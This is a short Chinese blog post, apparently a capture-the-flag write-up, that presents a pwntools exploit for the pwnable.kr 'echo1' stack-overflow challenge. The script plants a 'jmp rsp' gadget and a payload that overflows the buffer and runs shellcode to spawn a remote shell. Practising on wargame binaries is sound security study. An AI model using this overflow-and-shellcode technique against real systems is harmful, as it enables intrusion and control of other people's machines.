标签:hex logs int ble inter utf-8 text close debug
pwnable的echo1,一个栈溢出的漏洞,同样以后再补上分析过程和思路,先放exp
1 #!/usr/bin/env python 2 # -*- coding: utf-8 -*- 3 __Auther__ = ‘M4x‘ 4 5 from pwn import * 6 context.arch = ‘amd64‘ 7 context.os = ‘linux‘ 8 context.log_level = ‘debug‘ 9 10 elf = ELF(‘./echo1‘) 11 id_addr = elf.symbols[‘id‘] 12 # print hex(id_addr) 13 jmp = asm(‘jmp rsp‘) 14 shellcode = asm(shellcraft.sh()) 15 16 # io = process(‘./echo1‘) 17 io = remote(‘pwnable.kr‘, 9010) 18 19 io.recvuntil(‘name? : ‘) 20 io.sendline(jmp) 21 22 io.recvuntil(‘> ‘) 23 io.sendline(‘1‘) 24 25 payload = ‘A‘ * 40 + p64(id_addr) + shellcode 26 io.sendline(payload) 27 28 io.interactive() 29 io.close()
标签:hex logs int ble inter utf-8 text close debug
原文地址:http://www.cnblogs.com/WangAoBo/p/7470304.html
